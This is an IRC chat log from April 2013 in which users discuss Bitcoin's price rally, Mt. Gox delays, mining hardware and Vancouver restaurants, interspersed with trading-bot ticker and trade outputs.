hour low: 184.58200, 24 hour high: 240.11100, 24 hour vwap: 213.48161 Apr 10 02:05:20 volume ticked up from 101000 a few hours earlier. Apr 10 02:05:57 what does mpex stand for? mirceau popescu's exchange? Apr 10 02:06:04 yea Apr 10 02:06:14 i thought so, but never asked. Apr 10 02:07:44 oops, sorry about the u, stupid one hand type Apr 10 02:08:09 ya i dunno why people give me all their us Apr 10 02:09:16 [MPEX] [O.USD.C206T] 30 @ 0.24933615 = 7.4801 BTC [+] Apr 10 02:09:48 we can't say it in our heads w/out a U. hell, we can't even say it. you know that. Apr 10 02:10:22 i'm from texas, i don't speak right. Apr 10 02:10:43 if you're a weasel from texas no wonder you're dead. Apr 10 02:13:01 85mph on a couple of our highways. i don't stand a chance. Apr 10 02:13:13 i know, no speed limits in romania? Apr 10 02:18:27 we now know why do americans remove the u in colour, honour and other words.. to give to mircea Apr 10 02:18:40 lol u redistribution Apr 10 02:18:46 [BTCTC] [S.DICE-PT] 1 @ 0.00398 BTC [+] Apr 10 02:18:50 deadweasel i think speed limit is 55 here Apr 10 02:19:43 mircea_popescu, withdrawals pls Apr 10 02:20:33 [BTCTC] [S.DICE-PT] 1 @ 0.003989 BTC [+] Apr 10 02:21:03 [MPEX] [S.MPOE] 2000 @ 0.00070579 = 1.4116 BTC [-] Apr 10 02:24:06 [HAVELOCK] [VTX] 1 @ 0.225 BTC [+] Apr 10 02:25:06 [HAVELOCK] [HIM] 6 @ 1.15 = 6.9 BTC [+] Apr 10 02:25:42 dude HIM plummeted Apr 10 02:25:46 topace|2: wtf is going on? Apr 10 02:26:38 ;;goxlag Apr 10 02:26:39 MtGox lag is 94.39232 seconds. During this time, light travels 0.189161152411 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 10 02:28:05 mircea_popescu: how much are trilema credits now? Apr 10 02:28:15 same as always Apr 10 02:28:25 a bitcoin buys you like 200k Apr 10 02:29:13 so .01 bitcoin is like 2k? Apr 10 02:29:26 i suspect the recent plummeting of stocks Apr 10 02:29:26 okay I will buy more and get it passworded Apr 10 02:29:32 is people cashing out of bitcoin Apr 10 02:30:05 there is a waitlist of 11000 on mtgox, no one is cashing out of BTC anytime soon. hold Apr 10 02:30:07 ThickAsThieves: people are always cashing out of bitcoin, but there are a lot of businesses that depend on bitcoin circulating no? Apr 10 02:30:10 I mean sell! Apr 10 02:30:13 i mean hold? Apr 10 02:30:25 Don't hold spend Apr 10 02:30:26 short the forward? Apr 10 02:30:30 ... Apr 10 02:30:31 spend spend spend Apr 10 02:30:32 double put Apr 10 02:30:49 11k in queue? let's say each one buys one btc... Apr 10 02:30:51 ;;market buy 11000 Apr 10 02:30:52 A market order to buy 11000 bitcoins right now would take 2771320.6718 USD and would take the last price up to 286.0000 USD, resulting in an average price of 251.9382 USD/BTC. | Data vintage: 74.5696 seconds Apr 10 02:31:10 ;;market sell 50000 Apr 10 02:31:11 A market order to sell 50000 bitcoins right now would net 8459539.8771 USD and would take the last price down to 100.5100 USD, resulting in an average price of 169.1908 USD/BTC. | Data vintage: 93.5936 seconds Apr 10 02:31:23 ;;market sell 5000 Apr 10 02:31:23 A market order to sell 5000 bitcoins right now would net 1109898.4968 USD and would take the last price down to 216.4966 USD, resulting in an average price of 221.9797 USD/BTC. | Data vintage: 105.9529 seconds Apr 10 02:31:44 ;;bids 1 Apr 10 02:31:46 There are currently 357138.57 bitcoins demanded at or over 1.0 USD, worth 14054330.0402 USD in total. | Data vintage: 0.0104 seconds Apr 10 02:31:59 ;;asks 250 Apr 10 02:31:59 There are currently 6925.555 bitcoins offered at or under 250.0 USD, worth 1682002.33694 USD in total. | Data vintage: 13.6257 seconds Apr 10 02:32:19 [BTCTC] [ASICMINER-PT] 10 @ 0.77959 = 7.7959 BTC [-] Apr 10 02:32:24 [BTCTC] [GSDPT] 2 @ 0.002421 = 0.0048 BTC [+] Apr 10 02:32:30 [BTCTC] [GSDPT] 1 @ 0.00242 BTC [-] Apr 10 02:32:33 [BTCTC] [GSDPT] 59 @ 0.00241 = 0.1422 BTC [-] Apr 10 02:32:39 [BTCTC] [GSDPT] 394 @ 0.0024 = 0.9456 BTC [-] Apr 10 02:32:52 money to be made...... Apr 10 02:33:05 i think Wickamela is with an educational instutition. Apr 10 02:33:22 anyway. catch ya all later. Apr 10 02:33:32 lol Apr 10 02:33:44 nite Apr 10 02:34:08 [HAVELOCK] [VTX] 7 @ 0.267 = 1.869 BTC [+] **** BEGIN LOGGING AT Wed Apr 10 09:55:54 2013 Apr 10 09:56:07 gooood mornin' Apr 10 10:00:16 moaning :) Apr 10 10:02:28 [BTCTC] [ASICMINER-PT] 1 @ 0.7769 BTC [+] Apr 10 10:02:38 lol Apr 10 10:04:08 [BTCTC] [B.YABMC] 1 @ 0.01196 BTC [-] Apr 10 10:04:16 [BTCTC] [B.YABMC] 18 @ 0.01197 = 0.2155 BTC [+] Apr 10 10:04:20 [BTCTC] [B.YABMC] 1 @ 0.01199 BTC [+] Apr 10 10:08:29 lol at am? Apr 10 10:08:58 7769 seems fair Apr 10 10:16:29 ;;ticker Apr 10 10:16:30 BTCUSD ticker | Best bid: 234.88701, Best ask: 234.99988, Bid-ask spread: 0.11287, Last trade: 234.99988, 24 hour volume: 104419.56405479, 24 hour low: 189.60123, 24 hour high: 240.11100, 24 hour vwap: 220.28807 Apr 10 10:30:01 [MPEX] [S.MPOE] 19400 @ 0.00071213 = 13.8153 BTC [-] Apr 10 10:36:28 bulls are running again Apr 10 10:41:35 could you review my bet of gox to 1000$ before end of april. I set it to end within 2 weeks to make it a bit more interesting ;) Apr 10 10:43:03 is it just me or is the forum down? Apr 10 10:45:50 quite unstable here Apr 10 10:46:14 isn't it down/slow/whatever most fo the time ? Apr 10 10:49:03 [MPEX] [S.MPOE] 6500 @ 0.00070927 = 4.6103 BTC [-] Apr 10 10:55:02 [BTCTC] [B.YABMC] 1 @ 0.01199 BTC [+] Apr 10 10:58:20 [BTCTC] [RSM] 1 @ 0.00188 BTC [-] Apr 10 11:00:58 only thing worse than laggy data Apr 10 11:01:00 is no data at all Apr 10 11:02:25 plz to not come bother me Apr 10 11:02:31 i call da police. Apr 10 11:09:43 https://blockchain.info/address/12RYJjGk22NiNbhTHffCrCso4XgVzet5Eh`dvi Apr 10 11:09:43 hdmi to dvi Apr 10 11:09:43 0`wii u dvi Apr 10 11:09:43 hdmi to dvi Apr 10 11:10:04 https://blockchain.info/address/12RYJjGk22NiNbhTHffCrCso4XgVzet5Eh Apr 10 11:10:08 Who owns this address? Apr 10 11:10:24 what, that works now ? Apr 10 11:12:20 bowjob https://blockchain.info/tx/fcc667ab400ab58ee120e4b5a3fc0eb54b8a38c9da35ddb26a41d6df5fb9d8a4 Apr 10 11:12:32 that may interest you. connects it to leandro cesar, the mercado bitcoin guy Apr 10 11:12:56 Oh I see.. didnt he get hacked Apr 10 11:14:19 https://blockchain.info/tx/d4755b14eda35d28b6ac8aa3f57fec8280f8ef1f04efe3c22bf5b67e936531f1 Apr 10 11:14:22 and then it ends up at gox Apr 10 11:14:26 all this is 2011 you'll note Apr 10 11:14:45 tbh it looks a lot like a gox cold wallet. Apr 10 11:33:29 [BTCTC] [ASICMINER-PT] 1 @ 0.77649 BTC [-] Apr 10 11:43:42 http://imageshack.us/f/600/avalononebay.jpg/ Apr 10 11:43:46 Oh lala Apr 10 11:45:45 and we're going down. Apr 10 11:45:47 ;;ticker Apr 10 11:45:48 BTCUSD ticker | Best bid: 235.50000, Best ask: 235.63800, Bid-ask spread: 0.13800, Last trade: 235.63800, 24 hour volume: 106384.26600045, 24 hour low: 191.55000, 24 hour high: 240.11100, 24 hour vwap: 221.80184 Apr 10 11:45:54 ono. 230 was broken Apr 10 11:46:23 90.02 @ 232.00 just traded Apr 10 11:49:27 pop goes the bubble Apr 10 11:49:53 seems it recovered Apr 10 11:50:05 if someone dumps 900 next time tho... Apr 10 11:50:10 i'm afraid we might break out to the upside... Apr 10 11:50:35 theres over 10k at gox waiting to get verified Apr 10 11:50:48 hard to imagine they will register to dump Apr 10 11:50:49 lol Apr 10 11:50:58 why ? Apr 10 11:51:08 i always quesrtoned this, everyone is like "o, queue at gox" Apr 10 11:51:19 for all you know it's people who had 50 btc they forgot about Apr 10 11:51:21 you dont have to get verified to deposit btc Apr 10 11:51:33 but you'd need rto be to withdraw your funds Apr 10 11:51:43 for all we know most of those accounts are already out of the mkt Apr 10 11:51:53 jkust sitting ion whatever cash mtgox owes them waiting Apr 10 11:51:59 oh, right Apr 10 11:52:05 (and for all we know mtgox doesn't even have that cash ready) Apr 10 11:52:09 but that's a different kettle. Apr 10 11:53:33 ;;nethash Apr 10 11:53:33 65674.1880238 Apr 10 11:59:01 [HAVELOCK] [SDICE] 1 @ 0.287 BTC [+] Apr 10 12:00:35 [MPEX] [S.MPOE] 8401 @ 0.0007035 = 5.9101 BTC [-] Apr 10 12:00:37 [MPEX] [S.MPOE] 3403 @ 0.00070202 = 2.389 BTC [-] Apr 10 12:01:33 there is over 18,000 waiting to get verified at gox Apr 10 12:01:53 i have people coming to me and trying to buy in thailand, like 100,000 usd per order, its fucking crazy Apr 10 12:02:59 i think most of it is new people Apr 10 12:03:08 new blood into the market, but sure, some to take it out Apr 10 12:04:13 i already stopped talking about btc irl Apr 10 12:04:23 fuck this shit. i told them to buy at 13.5. i told them i cashed out Apr 10 12:07:16 hey chang, i had 3 thai dishes today, pad ped, green curry and cashew chicken Apr 10 12:07:28 gc > pad ped >>>>>>>>>> casher chicken Apr 10 12:07:33 cashew chicken Apr 10 12:07:41 what do u think? Apr 10 12:10:02 [BTCTC] [ASICMINER-PT] 1 @ 0.75651 BTC [-] Apr 10 12:10:09 [BTCTC] [ASICMINER-PT] 1 @ 0.7565 BTC [-] Apr 10 12:10:16 [BTCTC] [ASICMINER-PT] 1 @ 0.75641 BTC [-] Apr 10 12:10:19 [BTCTC] [ASICMINER-PT] 1 @ 0.7564 BTC [-] Apr 10 12:10:31 [BTCTC] [ASICMINER-PT] 7 @ 0.74201 = 5.1941 BTC [-] Apr 10 12:10:33 [BTCTC] [ASICMINER-PT] 1 @ 0.742 BTC [-] Apr 10 12:10:36 [BTCTC] [ASICMINER-PT] 2 @ 0.7402 = 1.4804 BTC [-] Apr 10 12:10:39 [BTCTC] [ASICMINER-PT] 1 @ 0.7401 BTC [-] Apr 10 12:10:42 [BTCTC] [ASICMINER-PT] 5 @ 0.74 = 3.7 BTC [-] Apr 10 12:10:45 [BTCTC] [ASICMINER-PT] 22 @ 0.73925 = 16.2635 BTC [-] Apr 10 12:12:31 [BTCTC] [ASICMINER-PT] 10 @ 0.739211 = 7.3921 BTC [-] Apr 10 12:12:34 [BTCTC] [ASICMINER-PT] 13 @ 0.73921 = 9.6097 BTC [-] Apr 10 12:12:37 [BTCTC] [ASICMINER-PT] 8 @ 0.7391 = 5.9128 BTC [-] Apr 10 12:13:27 [BTCTC] [ASICMINER-PT] 10 @ 0.7391 = 7.391 BTC [-] Apr 10 12:13:30 [BTCTC] [ASICMINER-PT] 1 @ 0.739 BTC [-] Apr 10 12:26:01 ;;ticker Apr 10 12:26:02 BTCUSD ticker | Best bid: 240.00000, Best ask: 241.67000, Bid-ask spread: 1.67000, Last trade: 241.67000, 24 hour volume: 107066.49201964, 24 hour low: 193.50300, 24 hour high: 240.11100, 24 hour vwap: 222.26621 Apr 10 12:26:14 ;;bids 0 Apr 10 12:26:17 There are currently 33211201 bitcoins demanded at or over 0.0 USD, worth 12846229.62 USD in total. | Data vintage: 0.0136 seconds Apr 10 12:36:22 "I'm working with Exante.eu to broker deals getting London hedge funds into BTC. We've got more than $1 bn. lined " Apr 10 12:36:26 Max KEiser Apr 10 12:36:27 lol Apr 10 12:36:55 he's giving us a tip to buy now. Apr 10 12:37:06 get rich off their backs Apr 10 12:40:38 [BTCTC] [ASICMINER-PT] 1 @ 0.776 BTC [+] Apr 10 12:41:22 [BTCTC] [ASICMINER-PT] 3 @ 0.7759 = 2.3277 BTC [-] Apr 10 12:44:04 bowjob: Exante already has a portfolio of 81k BTC, I was shocked to read it Apr 10 12:44:30 1 b in btc would baloon us to 10b? market cap? Apr 10 12:44:44 im gonna be a millionaire in fiat value Apr 10 12:45:08 hopefully people start accepting btc for houses in vancouver Apr 10 12:45:16 id love be a landowner at age 21, hehe Apr 10 12:45:31 oh hi vancouver mate Apr 10 12:46:05 hi Apr 10 12:46:11 bowjob: I'm looking to buy a penthouse with a couple bitcoins :) Apr 10 12:46:14 mhm Apr 10 12:46:24 where in van? Apr 10 12:46:30 dt Apr 10 12:46:35 id love to get my hands on dt as well Apr 10 12:46:40 i heard most of it is empty Apr 10 12:46:41 get a room ^^ Apr 10 12:46:44 id atually live in it Apr 10 12:46:46 yeah it's crazy Apr 10 12:46:52 i love downtown Apr 10 12:47:04 I'm down downtown, seymour and robson Apr 10 12:47:10 view to granville st Apr 10 12:47:11 its my cakeday tomorrow, ill head over to downtown for nice meals Apr 10 12:47:15 yeah that place is awesome Apr 10 12:47:31 my friends know of my bitcoin riches, they dont seem to ask for handouts which is great Apr 10 12:47:31 lol Apr 10 12:47:49 imma head over to le crocodile, get the chef menu Apr 10 12:47:49 riches? Apr 10 12:47:52 for 3 of mah buddies Apr 10 12:48:03 I damn wish I had more bitcoins, but I'm not rich yet Apr 10 12:48:12 umm, i took some fiat values, im not rich lol Apr 10 12:48:30 i made it so that i cant lose in this game. i got my money out, and then some Apr 10 12:48:33 im set for another year Apr 10 12:48:43 sweet Apr 10 12:48:45 and, i have an avalon coming yyeah? Apr 10 12:48:48 ^ Apr 10 12:49:02 I mined my coins, only bought 75 more about a week ago. Apr 10 12:49:06 ah Apr 10 12:49:12 you got an asic? Apr 10 12:49:20 nah, this was years ago Apr 10 12:49:30 i have a buddy who mined 500 btc Apr 10 12:49:36 sold them for a few hundred bucks.. Apr 10 12:49:38 12 GPUS running and huming 24/7. Seems like it was worth it Apr 10 12:49:38 >_> Apr 10 12:50:09 so, cakeday. to le crocodile Apr 10 12:50:13 hehe Apr 10 12:50:14 nomnom Apr 10 12:50:30 i havent really splurged at all Apr 10 12:50:34 hope you get your avalon soon.. Once they hit the market, the profits are going to collapse.. And soon bit players are going to start getting asics. Apr 10 12:50:47 coulda walked into hermes shop and walk out with stuff Apr 10 12:50:50 but if you're lucky, you could get a month or two headstart. Apr 10 12:50:51 not my style tho Apr 10 12:51:08 Well, im pretty sure id get at least 170 BTC back Apr 10 12:51:31 bfl seems to be in trouble Apr 10 12:51:42 I pre-orederd BFL but cancelled it after waiting for 6 months. BS service. Apr 10 12:51:47 i wish i bought more avalons Apr 10 12:51:47 ;;ticker Apr 10 12:51:48 BTCUSD ticker | Best bid: 249.01000, Best ask: 249.49900, Bid-ask spread: 0.48900, Last trade: 249.49900, 24 hour volume: 108720.87911572, 24 hour low: 193.81110, 24 hour high: 249.00000, 24 hour vwap: 223.14239 Apr 10 12:51:53 i would sell one of them Apr 10 12:51:53 250 here we come Apr 10 12:52:06 and mine one. that way, i get my cake and it too Apr 10 12:52:14 pizzaman1337: 1000$ will be hit before end of week :) Apr 10 12:52:22 $1000 is kinda high... Apr 10 12:52:26 for this week Apr 10 12:52:27 nah Apr 10 12:52:33 theres this guy named blacklilac, who offerd 171 BTC for an avalon Apr 10 12:52:36 hes a vancouverite too Apr 10 12:52:44 ;;asks 1000 Apr 10 12:52:46 There are currently 27967.965 bitcoins offered at or under 1000.0 USD, worth 12626807.4112 USD in total. | Data vintage: 0.0026 seconds Apr 10 12:53:04 ;;bids 0 Apr 10 12:53:05 There are currently 33210999 bitcoins demanded at or over 0.0 USD, worth 12758878.916 USD in total. | Data vintage: 18.5050 seconds Apr 10 12:53:14 rikur. i have an uncle who owns 3 houses. he makes bank Apr 10 12:53:31 i wanna do taht shit as well.. , it seems the prices of houses will go down soon Apr 10 12:53:41 if btc rises enough, ill strike this shit Apr 10 12:53:47 ;;bids 100 Apr 10 12:53:47 There are currently 49348.324 bitcoins demanded at or over 100.0 USD, worth 7949601.91864 USD in total. | Data vintage: 61.0224 seconds Apr 10 12:53:59 bowjob: yeah the housing prices here are a joke. I moved in about a year ago, and won't buy until I'm a bitcoin millionaire or there's a correction. Apr 10 12:54:10 btw, have you been to bella gelateria? Apr 10 12:54:22 i love that place. <3 Apr 10 12:54:26 bowjob: not unless it's in yaletown? Apr 10 12:54:44 west cordova, close to canada plac Apr 10 12:54:50 I can't remember the name of the place, but the there's an italian one I think. Apr 10 12:54:58 hmm. maybe not then. Apr 10 12:54:59 yeah, bella gelateria. Apr 10 12:55:18 I guess "close" is so relative when you live dt Apr 10 12:55:26 http://www.yelp.ca/biz/bella-gelateria-vancouver-2 Apr 10 12:55:39 theres this place i want to go to.. its called Finch's coffee and tea house Apr 10 12:55:45 i heard its godtier shop. Apr 10 12:56:02 bowjob: I've heard it's really nice, but small and crowded Apr 10 12:56:13 im gonna try it as well... so many top tier place in vancouver its like.. the best foods congregate there Apr 10 12:56:16 mhm Apr 10 12:56:22 ive been to miku Apr 10 12:56:40 with my buddy.. we were gonna go to exp bar that day Apr 10 12:56:57 but it was closed.. and we werent even dressed for the occation Apr 10 12:57:08 my recommendations: Sunday brunch at Beyond Restaurant (25$ / person), Twisted Fork (very small and nice restaurant).. Apr 10 12:57:09 lots of business suits over there Apr 10 12:57:21 never heard those places Apr 10 12:57:49 trying to think of more but am too tired and medicated :D Apr 10 12:57:53 you like sushi? Apr 10 12:57:56 yeah Apr 10 12:58:05 octopus garden at kitsilano Apr 10 12:58:19 hehe, you know what? I've never been to kits Apr 10 12:58:21 i wanted to get the 100 dollar menu but the head chef wasnt there, so i had the 65 dollar one instead Apr 10 12:58:24 ah Apr 10 12:58:36 me neither. till i went there exclusively for that place Apr 10 12:58:45 But I should explore a lot now, still waiting for my new LMO and Work Permit. Apr 10 12:58:51 have all the time in the world Apr 10 12:59:00 hell, if bitcoin keeps this up I might not need the job :D Apr 10 12:59:08 http://2.bp.blogspot.com/_v45-TBo7M6U/TNEJ5Mwu7ZI/AAAAAAAAMZQ/d12LBCBsids/s1600/Sashimi+Platter.jpg Apr 10 12:59:11 That. Apr 10 12:59:20 I'll have 2 parties for my cake day. Apr 10 12:59:24 1 with fam, 1 with friends Apr 10 12:59:29 oh and ofcourse, best nachos are at The Foundation Apr 10 13:00:01 have you ever been to vij's? Apr 10 13:00:01 that's a nice platter :) Apr 10 13:00:14 yeha, you know what. that platter Apr 10 13:00:20 ;;ticker Apr 10 13:00:20 BTCUSD ticker | Best bid: 249.87990, Best ask: 249.87999, Bid-ask spread: 0.00009, Last trade: 249.87999, 24 hour volume: 109125.46115724, 24 hour low: 193.84000, 24 hour high: 249.87999, 24 hour vwap: 223.42658 Apr 10 13:00:21 nah.. I have a bad habit of sticking to a couple places I like :/ Apr 10 13:00:24 is part of a course Apr 10 13:00:39 you can eat a godtier meal for 2.. for less than 1 bitcoin Apr 10 13:00:48 haha Apr 10 13:00:54 yeah me too. but i love trying out new places Apr 10 13:01:04 im a bit of a foodie so Apr 10 13:01:10 so do you have hundreds or thousands coins? Apr 10 13:01:23 just, hundreds Apr 10 13:01:29 check, same here Apr 10 13:01:34 but im set in fiat terms Apr 10 13:01:55 i havent worked for like 8 months now LOL Apr 10 13:02:18 i got most of my BTC when they were 13 dollars ea Apr 10 13:02:18 dunno.. I just got a golden handshake. and it's gone. Apr 10 13:02:22 oh sweet Apr 10 13:02:23 just before the great rally Apr 10 13:02:29 so you've been seriously cashing out Apr 10 13:02:34 nah Apr 10 13:02:42 no point Apr 10 13:02:45 i dont need the cash Apr 10 13:02:51 i want a house. but i cant afford it Apr 10 13:02:57 i can afford everything else Apr 10 13:03:07 so having 50k in the bank wont help me Apr 10 13:03:15 Hehe, I'm saving for my houses too. But also for my immortality and trip to mars. Apr 10 13:03:20 haha Apr 10 13:03:22 I bought $45 worth at $9 ... wow... it's worth like $1150 now - :\ Who knew... Apr 10 13:03:39 tbh, we're both gonna be very wealthy, it seems. Apr 10 13:03:49 yep Apr 10 13:03:54 totally normal behavior Apr 10 13:03:56 I want to open a foodcart in vancouver Apr 10 13:04:02 price just comes to a standstill Apr 10 13:04:02 HAHA ! Apr 10 13:04:05 for 5 minutes Apr 10 13:04:46 I have a friend who got 19 bitcoins when he used school computers Apr 10 13:04:52 back in the day Apr 10 13:05:07 it was still on his account.., I helped him transfer it to electrum Apr 10 13:05:25 just imagine when 1 satoshi = 1 $ Apr 10 13:05:43 too bullish for me Apr 10 13:05:44 lol Apr 10 13:05:52 1 satoshi 1 cent, maybe in 10 years Apr 10 13:06:03 you'd be surprised Apr 10 13:06:05 ooh. i got an idea. Apr 10 13:06:13 i want to eat the worlds most expensive hotdog Apr 10 13:06:22 !!. its only .5 btc Apr 10 13:06:28 heck less than that Apr 10 13:06:44 .4 btc? Apr 10 13:07:22 Just one of the tax haves got whistle blowed recently: 40 TRILLION USD of hidden money, and now the govts are stupid enough to go after it.. If they do, the money will find a new home and some of that will go to bitcoins too. Apr 10 13:07:49 yeaps Apr 10 13:07:53 bowjob: let's order a set if the agrees to sell them in BTC? Apr 10 13:07:55 [BTCTC] [ASICMINER-PT] 1 @ 0.7749 BTC [-] Apr 10 13:08:07 huh? Apr 10 13:08:14 set of.. the hotdogs? Apr 10 13:08:16 :3 Apr 10 13:08:16 the hot dogs :D Apr 10 13:08:19 xD Apr 10 13:08:21 [BTCTC] [ASICMINER-PT] 1 @ 0.775 BTC [+] Apr 10 13:08:38 not a bad idea Apr 10 13:08:51 the guy could get the title for worlds most expensive hot dogs for the next 100 years :DD Apr 10 13:09:03 if not, then i dont mind spending fiat either way Apr 10 13:09:31 i find calculating prices of goods in btc a good mental exercise Apr 10 13:09:39 nah, I'm a scrooge. If it doesn't promote bitcoins, I'll rather eat canned soup :D Apr 10 13:10:02 so, 0.4 BTC for that glorious hotdog Apr 10 13:10:40 ;;ticker Apr 10 13:10:41 BTCUSD ticker | Best bid: 249.99999, Best ask: 250.00000, Bid-ask spread: 0.00001, Last trade: 250.00000, 24 hour volume: 109468.05441769, 24 hour low: 193.95111, 24 hour high: 250.00000, 24 hour vwap: 223.69880 Apr 10 13:10:42 it comes with wagyu beef and lobster, and some of that louis XII ? Apr 10 13:12:05 ;;asks 250 Apr 10 13:12:06 There are currently 1167.9295 bitcoins offered at or under 250.0 USD, worth 291982.352046 USD in total. | Data vintage: 105.4371 seconds Apr 10 13:12:25 rikur, i have a poor acquiatance who learned about bitcoins at 17 dollars Apr 10 13:12:33 nevr invested to 200 bucks, Apr 10 13:12:50 each time it goes up, its a bubble. each times, it flash crashes, its dying Apr 10 13:13:45 hehe yeah. A friend of mine sold 100+ at 20$/btc. He's hitting himself hard these days. Apr 10 13:14:04 They laughed at my adamant stacking and waiting for 10k/coin Apr 10 13:14:40 imo dont tell anyone else about the amount of btc you have Apr 10 13:14:52 its like winning the lottery.. but better. you can preserve your anonymity Apr 10 13:15:20 yeah, I'll downplay the numbers whenever someone asks :) Apr 10 13:15:23 distant aunts and uncles wont bother you.. Apr 10 13:15:40 and that kid you bumped into 5 years ago wont bother as well Apr 10 13:15:56 [BTCTC] [BASIC-MINING] 1 @ 0.39 BTC [-] Apr 10 13:16:14 so gox has been down for 10 mins Apr 10 13:16:41 ;;ticker Apr 10 13:16:42 BTCUSD ticker | Best bid: 249.99800, Best ask: 249.99990, Bid-ask spread: 0.00190, Last trade: 249.99800, 24 hour volume: 108766.46027008, 24 hour low: 194.30000, 24 hour high: 250.00000, 24 hour vwap: 224.07281 Apr 10 13:16:45 ;;goxlag Apr 10 13:16:45 MtGox lag is 0.20385 seconds. During this time, light travels 0.000408513117582 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 10 13:16:49 its not down Apr 10 13:16:59 but not executing trades either Apr 10 13:17:14 oh Apr 10 13:17:32 i dont really go to mt gox and watch the price these days Apr 10 13:17:50 but i cant sleep. Apr 10 13:18:44 http://bitbet.us/bet/392/mtgox-bitcoin-usd-exchange-rate-250-before/ Apr 10 13:18:58 warning. if you send a bet there, you will lose you bitcoins Apr 10 13:19:17 the bet is over, i saw some people game the system at 200 Apr 10 13:19:56 btw, there is a BCIT instructor that holds 10k btc Apr 10 13:20:10 according to my IT friend.. ^ and old school miner Apr 10 13:21:48 [MPEX] [S.DICE] 300 @ 0.00283546 = 0.8506 BTC [+] Apr 10 13:22:10 I refuse to believe mtgox isn't fucking with their engine on purpose now Apr 10 13:22:20 this stale action doesnt seem real at 250 Apr 10 13:22:36 oh here we go, ther was a drop Apr 10 13:22:41 it gives us stability Apr 10 13:22:45 even momentarily Apr 10 13:22:51 fake stability Apr 10 13:22:55 like dick in ass Apr 10 13:22:58 ;;ticker Apr 10 13:22:59 BTCUSD ticker | Best bid: 247.38630, Best ask: 248.00000, Bid-ask spread: 0.61370, Last trade: 248.00000, 24 hour volume: 108532.84546070, 24 hour low: 194.90001, 24 hour high: 250.00000, 24 hour vwap: 224.29028 Apr 10 13:25:20 taub: it's a complete black box, gox that is. they could be front running trades for massive profits. Apr 10 13:25:47 yep Apr 10 13:25:58 engage lag, look into the future Apr 10 13:26:15 so to speak Apr 10 13:26:18 man.. i asked casa to send me an invite to buy 100 1 BTc oins Apr 10 13:26:21 i got ignored lol Apr 10 13:26:41 im too small of a fish for him. i wonder what kind of orders hes getting Apr 10 13:26:42 casa? Apr 10 13:26:48 casascius coins Apr 10 13:27:00 ah Apr 10 13:27:01 i have just 1.. i wish i got more Apr 10 13:27:11 risky though Apr 10 13:27:28 i mostly use it as a "fuck u. BTC can exist phyiscally" Apr 10 13:29:05 ;;ticker Apr 10 13:29:09 BTCUSD ticker | Best bid: 244.99000, Best ask: 247.00000, Bid-ask spread: 2.01000, Last trade: 247.38630, 24 hour volume: 108068.12006362, 24 hour low: 195.20000, 24 hour high: 250.00000, 24 hour vwap: 224.55260 Apr 10 13:30:02 [MPEX] [S.MPOE] 5076 @ 0.00070202 = 3.5635 BTC [-] Apr 10 13:30:23 its 3:29 am wtf am i doing Apr 10 13:34:44 wanking about bitcoins Apr 10 13:34:46 same as me Apr 10 13:34:55 we're bithipsters Apr 10 13:35:04 we bought bitcoins before buying them were cool Apr 10 13:35:15 haha Apr 10 13:35:23 need to get a shirt like that Apr 10 13:36:09 but yeah.. would be cool to just travel slowly for a few years Apr 10 13:36:28 i wanna visit japan Apr 10 13:36:40 i can bring the big bucks for the best food around Apr 10 13:37:05 one place ill never dare set foot in is mexico Apr 10 13:37:15 ive seen the worst shit happen in that place Apr 10 13:37:17 im terrified Apr 10 13:37:32 still pretty safe for tourists Apr 10 13:38:00 dunno man, i seen to many narco vids Apr 10 13:38:02 bowjob: or russia Apr 10 13:38:16 russia... im ambivalent toward it Apr 10 13:38:30 well I'm from Finland, so.. Apr 10 13:38:44 I've heard my share of stories of russia :) Apr 10 13:38:54 there's always FUD about a country next door Apr 10 13:38:54 ah, i heard the happnies index there is high Apr 10 13:39:09 well, next door to canada is us Apr 10 13:39:14 im sure the fud is warranted Apr 10 13:39:19 heh Apr 10 13:39:35 punkman: true, but shooting and bagging people in bright daylight is still pretty hc. And the stuff that happens on the quiet roads.. Apr 10 13:40:44 also, google russia road rage vids Apr 10 13:41:13 yeah I've seen plenty of scary russian things Apr 10 13:41:25 russians seem to have dashcams everytime Apr 10 13:41:29 [BTCTC] [GSDPT] 7 @ 0.0029 = 0.0203 BTC [-] Apr 10 13:41:31 $avg Apr 10 13:41:32 [BTCTC] [GSDPT] 30 @ 0.00281 = 0.0843 BTC [-] Apr 10 13:41:34 [BTCTC] [GSDPT] 2000 @ 0.0028 = 5.6 BTC [-] Apr 10 13:41:36 MJR_: 220.66 Apr 10 13:41:58 ;;calc (220.66-164)/220.66 Apr 10 13:41:58 0.256775129158 Apr 10 13:43:47 i wanna eat at guu now Apr 10 13:43:51 hi all Apr 10 13:43:56 ;;seen benkay Apr 10 13:43:57 benkay was last seen in #bitcoin-assets 1 day, 7 hours, 59 minutes, and 39 seconds ago: forced bucketing of participants Apr 10 13:45:56 $250 huh Apr 10 13:49:56 seems to have leveled off a bit after the last few days Apr 10 13:52:12 we'll see Apr 10 13:52:25 don't ever turn your back on an insane bitcoin market Apr 10 13:52:26 lol Apr 10 13:53:28 what kind of new BTC services would you guys like to see this year? Apr 10 13:53:36 swaps Apr 10 13:53:42 bitcoin debit card Apr 10 13:53:48 ooh nice one bowjob Apr 10 13:53:49 whoot there it is Apr 10 13:53:53 bitcoin atm's Apr 10 13:53:54 id use it actually Apr 10 13:53:59 i'd use it too Apr 10 13:54:00 atm is the first step Apr 10 13:54:07 i was wishing i could take out $20 yesterday Apr 10 13:54:20 for me to load 1 BTC with the purchasing power of a few grand Apr 10 13:54:28 id spread it around Apr 10 13:54:38 you can already get debit cards Apr 10 13:54:49 can you use them to pay merchants tho Apr 10 13:54:52 prolly not Apr 10 13:55:01 where are these debit cards? Apr 10 13:55:03 make it so that the btc gets converted to fiat Apr 10 13:55:09 yeah, mastercard/visa for btc, I saw a few on btctalk Apr 10 13:55:12 that way merchants will be familiar Apr 10 13:55:21 no, thats different Apr 10 13:55:29 i mean a card loaded with BTC directly Apr 10 13:55:34 you just don't want to preload them Apr 10 13:55:36 i expect to see one soon Apr 10 13:55:45 I understand Apr 10 13:55:52 basically a visa card denominated in btc Apr 10 13:55:53 then i wont hoard as much lol Apr 10 13:57:47 rikur stil lhere? Apr 10 14:00:57 nice new options Apr 10 14:04:34 i accidentally put jogging pants on backwards Apr 10 14:04:44 lol Apr 10 14:04:46 according to chinese, its good luck Apr 10 14:05:07 btc for toll roads would be splendid Apr 10 14:05:36 you could easily get refunded for unused portions Apr 10 14:06:27 wow guys, this is awesome...get this Apr 10 14:07:15 $960619.34 in loan demand at 